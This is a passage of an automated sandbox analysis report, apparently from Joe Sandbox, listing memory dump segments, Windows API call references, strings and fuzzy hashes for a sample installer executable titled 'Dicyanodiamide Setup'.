                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: p!C$p!C
                                  • API String ID: 0-3125587631
                                  • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                  • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                  • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                  • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
                                  • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                  • Opcode Fuzzy Hash: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
                                  • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                  • Instruction ID: dcc2b246e3e85771245330633344c28aad3b6f2e7effc766acd5add5c88cb85a
                                  • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                  • Instruction Fuzzy Hash: DBE18A7190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                  • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                  • GetSysColor.USER32(?), ref: 004044D0
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                  • lstrlenW.KERNEL32(?), ref: 004044F1
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                  • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                  • SendMessageW.USER32(00000000), ref: 00404573
                                  • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                  • SetCursor.USER32(00000000), ref: 004045F2
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                  • SetCursor.USER32(00000000), ref: 0040460E
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: N$Space available: $gC@
                                  • API String ID: 3103080414-143380558
                                  • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                  • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                  • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                  • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextW.USER32(00000000,Dicyanodiamide Setup,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: Dicyanodiamide Setup$F
                                  • API String ID: 941294808-4282637217
                                  • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                  • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                  • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                  • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                  • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                    • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                    • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                  • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                  • wsprintfA.USER32 ref: 00405F85
                                  • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                  • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                    • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                    • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$[Rename]
                                  • API String ID: 2171350718-461813615
                                  • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                  • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                  • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                  • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040336A,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-3626601527
                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                  • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                  • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                  • GetSysColor.USER32(00000000), ref: 004042F3
                                  • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                  • SetBkMode.GDI32(?,?), ref: 0040430B
                                  • GetSysColor.USER32(?), ref: 0040431E
                                  • SetBkColor.GDI32(?,?), ref: 0040432E
                                  • DeleteObject.GDI32(?), ref: 00404348
                                  • CreateBrushIndirect.GDI32(?), ref: 00404352
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                  • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                  • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                    • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                  • String ID: 9
                                  • API String ID: 163830602-2366072709
                                  • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                  • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                  • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                  • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                  • GetMessagePos.USER32 ref: 00404C0F
                                  • ScreenToClient.USER32(?,?), ref: 00404C29
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
